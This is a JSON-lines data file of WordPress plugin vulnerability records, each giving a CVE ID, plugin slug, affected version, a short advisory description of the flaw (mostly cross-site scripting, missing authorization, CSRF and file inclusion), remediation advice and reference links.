{"CVE_ID":"CVE-2024-13550","slug":"abc-notation","versionImpact":"6.1.3","description":"The ABC Notation plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 6.1.3 via the 'file' attribute of the 'abcjs' shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/abc-notation\\\/tags\\\/6.1.3\\\/abc-notation.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/abc-notation\\\/tags\\\/6.1.3\\\/abc-notation.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e53a2b7a-7005-451a-88f2-c23d420b4aad?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e53a2b7a-7005-451a-88f2-c23d420b4aad?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13229","slug":"seo-by-rank-math","versionImpact":"1.0.235","description":"The Rank Math SEO \u2013 AI SEO Tools to Dominate SEO Rankings plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the update_metadata() function in all versions up to, and including, 1.0.235. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete any schema metadata assigned to any post.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L169\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L169\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222905\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222905\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/rankmath.com\\\/changelog\\\/free\\\/page\\\/2\\\/\",\"name\":\"https:\\\/\\\/rankmath.com\\\/changelog\\\/free\\\/page\\\/2\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-by-rank-math\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-by-rank-math\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5776f689-56dd-413d-b02d-5551b97dd5eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5776f689-56dd-413d-b02d-5551b97dd5eb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13703","slug":"crm-customer-relationship-management-by-vcita","versionImpact":"2.7.1","description":"The CRM and Lead Management by vcita plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the vcita_ajax_toggle_ae() function in all versions up to, and including, 2.7.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to enable and disable plugin widgets.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crm-customer-relationship-management-by-vcita\\\/trunk\\\/vcita-ajax-function.php#L6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crm-customer-relationship-management-by-vcita\\\/trunk\\\/vcita-ajax-function.php#L6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e8c2aa5-5770-4b88-b415-40c2aff69d84?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e8c2aa5-5770-4b88-b415-40c2aff69d84?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3098","slug":"video-sidebar-widget","versionImpact":"1.0.0.3","description":"The Video Url plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 1.0.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-sidebar-widget\\\/tags\\\/1.0.0.3\\\/delete.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-sidebar-widget\\\/tags\\\/1.0.0.3\\\/delete.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-sidebar-widget\\\/tags\\\/1.0.0.3\\\/video_edit.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-sidebar-widget\\\/tags\\\/1.0.0.3\\\/video_edit.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/video-sidebar-widget\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/video-sidebar-widget\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/587e28ea-b3f4-4e40-a7d2-c6a01ac905bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/587e28ea-b3f4-4e40-a7d2-c6a01ac905bf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6993","slug":"ultimate-wp-mail","description":"The Ultimate WP Mail plugin for WordPress is vulnerable to Privilege Escalation due to improper authorization within the get_email_log_details() AJAX handler in versions 1.0.17 to 1.3.6. The handler reads the client-supplied post_id and retrieves the corresponding email log post content (including the password-reset link), relying only on the \u2018edit_posts\u2019 capability without restricting to administrators or validating ownership. This makes it possible for authenticated attackers, with Contributor-level access and above, to harvest an admin\u2019s reset link and elevate their privileges to administrator.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-wp-mail\\\/tags\\\/1.3.6\\\/includes\\\/Ajax.class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-wp-mail\\\/tags\\\/1.3.6\\\/includes\\\/Ajax.class.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328277\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3328277\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-wp-mail\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-wp-mail\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b19794de-b623-4017-bd91-73986383c58b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b19794de-b623-4017-bd91-73986383c58b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8393","slug":"woolook","versionImpact":"1.7.0","description":"The Woocommerce Blocks \u2013 Woolook plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.7.0 via the via the 'tab' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included. Please note that this can also be exploited via CSRF techniques.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolook\\\/trunk\\\/includes\\\/views\\\/panel.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woolook\\\/trunk\\\/includes\\\/views\\\/panel.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf3916fc-f652-4615-872c-3f007b8999df?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf3916fc-f652-4615-872c-3f007b8999df?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36727","slug":"newsletter-manager","versionImpact":"1.5.1","description":"The Newsletter Manager plugin for WordPress is vulnerable to insecure deserialization in versions up to, and including, 1.5.1. This is due to unsanitized input from the 'customFieldsDetails' parameter being passed through a deserialization function. This potentially makes it possible for unauthenticated attackers to inject a serialized PHP object.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b82124b1-e5e1-4f1e-9513-90474fd3f066\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b82124b1-e5e1-4f1e-9513-90474fd3f066\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcfd8c4d-d48b-468d-a7d5-1ec05b068f79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dcfd8c4d-d48b-468d-a7d5-1ec05b068f79?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/insecure-deserialization-vulnerability-in-wordpress-newsletter-manager-plugin-unpatched\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/insecure-deserialization-vulnerability-in-wordpress-newsletter-manager-plugin-unpatched\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2353","slug":"chp-ads-block-detector","versionImpact":"3.9.4","description":"The CHP Ads Block Detector plugin for WordPress is vulnerable to unauthorized plugin settings update and reset due to a missing capability check on the chp_abd_action function in versions up to, and including, 3.9.4. This makes it possible for subscriber-level attackers to change or reset plugin settings. CVE-2023-36509 appears to be a duplicate of this issue.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2926660\\\/chp-ads-block-detector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2926660\\\/chp-ads-block-detector\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2920522\\\/chp-ads-block-detector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2920522\\\/chp-ads-block-detector\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4eca64d7-6e33-4b8e-af37-a3e8bbf2b76f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4eca64d7-6e33-4b8e-af37-a3e8bbf2b76f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922313\\\/chp-ads-block-detector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2922313\\\/chp-ads-block-detector\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-48754","slug":"delete-post-revisions-on-single-click","versionImpact":"4.6","description":"Cross-Site Request Forgery (CSRF) vulnerability in Wap Nepal Delete Post Revisions In WordPress allows Cross Site Request Forgery.This issue affects Delete Post Revisions In WordPress: from n\/a through 4.6.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/delete-post-revisions-on-single-click\\\/wordpress-delete-post-revisions-in-wordpress-plugin-4-6-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/delete-post-revisions-on-single-click\\\/wordpress-delete-post-revisions-in-wordpress-plugin-4-6-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-51404","slug":"myagileprivacy","versionImpact":"2.1.7","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MyAgilePrivacy My Agile Privacy \u2013 The only GDPR solution for WordPress that you can truly trust allows Stored XSS.This issue affects My Agile Privacy \u2013 The only GDPR solution for WordPress that you can truly trust: from n\/a through 2.1.7.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/myagileprivacy\\\/wordpress-my-agile-privacy-plugin-2-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/myagileprivacy\\\/wordpress-my-agile-privacy-plugin-2-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-33937","slug":"progressive-wp","versionImpact":"2.1.13","description":"Missing Authorization vulnerability in Nico Martin Progressive WordPress (PWA).This issue affects Progressive WordPress (PWA): from n\/a through 2.1.13.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/progressive-wp\\\/wordpress-progressive-wordpress-pwa-plugin-2-1-13-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/progressive-wp\\\/wordpress-progressive-wordpress-pwa-plugin-2-1-13-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4422","slug":"comparison-slider","versionImpact":"1.0.5","description":"The Comparison Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the slider title parameter in all versions up to, and including, 1.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0907c74e-0bb8-4761-aabf-79d880c78415?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0907c74e-0bb8-4761-aabf-79d880c78415?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/comparison-slider\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/comparison-slider\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4480","slug":"wp-prayers-request","versionImpact":"2.4.7","description":"The WP Prayer II WordPress plugin through 2.4.7 does not have CSRF check in place when updating its email settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c1e5dee9-c540-4cc1-8b94-c6d1650b52d3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c1e5dee9-c540-4cc1-8b94-c6d1650b52d3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5937","slug":"simple-alert-boxes","versionImpact":"1.4.0","description":"The Simple Alert Boxes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Alert shortcode in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a25ad405-a97e-4821-b57a-0f39d5ce5e70?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a25ad405-a97e-4821-b57a-0f39d5ce5e70?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-alert-boxes\\\/trunk\\\/plugin.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-alert-boxes\\\/trunk\\\/plugin.php#L71\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43965","slug":"wp-sendgrid-mailer","versionImpact":"1.4","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Smackcoders SendGrid for WordPress allows SQL Injection.This issue affects SendGrid for WordPress: from n\/a through 1.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-sendgrid-mailer\\\/wordpress-sendgrid-for-wordpress-plugin-1-4-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-sendgrid-mailer\\\/wordpress-sendgrid-for-wordpress-plugin-1-4-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11414","slug":"recipepress-reloaded","versionImpact":"2.12.0","description":"The RecipePress Reloaded plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Recipe Ingredients in all versions up to, and including, 2.12.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/recipepress-reloaded\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/recipepress-reloaded\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/193178a6-d566-4e0a-aa74-8d80a7c8ba04?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/193178a6-d566-4e0a-aa74-8d80a7c8ba04?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11352","slug":"twentytwenty","versionImpact":"1.0.1","description":"The TwentyTwenty plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'twentytwenty' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/twentytwenty\\\/tags\\\/1.0.1\\\/public\\\/class-twentytwenty.php#L271\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/twentytwenty\\\/tags\\\/1.0.1\\\/public\\\/class-twentytwenty.php#L271\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/twentytwenty\\\/tags\\\/1.0.1\\\/public\\\/class-twentytwenty.php#L77\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/twentytwenty\\\/tags\\\/1.0.1\\\/public\\\/class-twentytwenty.php#L77\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f805982-1141-4e28-b28c-93483646cf99?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f805982-1141-4e28-b28c-93483646cf99?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11756","slug":"sweepwidget","versionImpact":"2.0.6","description":"The SweepWidget Contests, Giveaways, Photo Contests, Competitions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sweepwidget' shortcode in all versions up to, and including, 2.0.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sweepwidget\\\/trunk\\\/sweepwidget.php#L936\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sweepwidget\\\/trunk\\\/sweepwidget.php#L936\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1ec6957-28c0-4441-8801-80b226569df9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f1ec6957-28c0-4441-8801-80b226569df9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13548","slug":"power-ups-for-elementor","versionImpact":"1.2.2","description":"The Power Ups for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'magic-button' shortcode in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/power-ups-for-elementor\\\/trunk\\\/modules\\\/magic-buttons-for-elementor\\\/magic_buttons_shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/power-ups-for-elementor\\\/trunk\\\/modules\\\/magic-buttons-for-elementor\\\/magic_buttons_shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/power-ups-for-elementor\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/power-ups-for-elementor\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b7ab552-1ec5-4479-84b9-3e44f6c0354d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3b7ab552-1ec5-4479-84b9-3e44f6c0354d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13227","slug":"seo-by-rank-math","versionImpact":"1.0.235","description":"The Rank Math SEO \u2013 AI SEO Tools to Dominate SEO Rankings plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Rank Math API in all versions up to, and including, 1.0.235 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L257\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-by-rank-math\\\/trunk\\\/includes\\\/rest\\\/class-shared.php#L257\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222905\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222905\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/rankmath.com\\\/changelog\\\/free\\\/page\\\/2\\\/\",\"name\":\"https:\\\/\\\/rankmath.com\\\/changelog\\\/free\\\/page\\\/2\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-by-rank-math\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/seo-by-rank-math\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24df10fb-5143-478e-90f0-27f604ad43ee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24df10fb-5143-478e-90f0-27f604ad43ee?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3097","slug":"wp-time-machine","versionImpact":"3.4.0","description":"The wp Time Machine plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.4.0. This is due to missing or incorrect nonce validation on the 'wpTimeMachineCore.php' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-time-machine\\\/trunk\\\/includes\\\/wpTimeMachineCore.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-time-machine\\\/trunk\\\/includes\\\/wpTimeMachineCore.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-time-machine\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-time-machine\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f44fdbb2-abb8-488f-bdc0-ec6eea93d92a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f44fdbb2-abb8-488f-bdc0-ec6eea93d92a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11141","slug":"sailthru-triggermail","versionImpact":"1.1","description":"The Sailthru Triggermail WordPress plugin through 1.1 does not sanitise and escape some of its settings and is missing CSRF protection which could allow subscribers to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6fe3544b-fb86-43e4-9771-6e9343f9f835\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6fe3544b-fb86-43e4-9771-6e9343f9f835\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5950","slug":"indieblocks","versionImpact":"0.13.2","description":"The IndieBlocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018kind\u2019 parameter in all versions up to, and including, 0.13.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/indieblocks\\\/trunk\\\/blocks\\\/facepile-content\\\/render.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/indieblocks\\\/trunk\\\/blocks\\\/facepile-content\\\/render.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/indieblocks\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/indieblocks\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41fdb3ea-1de4-4b90-a387-5932de7a5e7c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/41fdb3ea-1de4-4b90-a387-5932de7a5e7c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
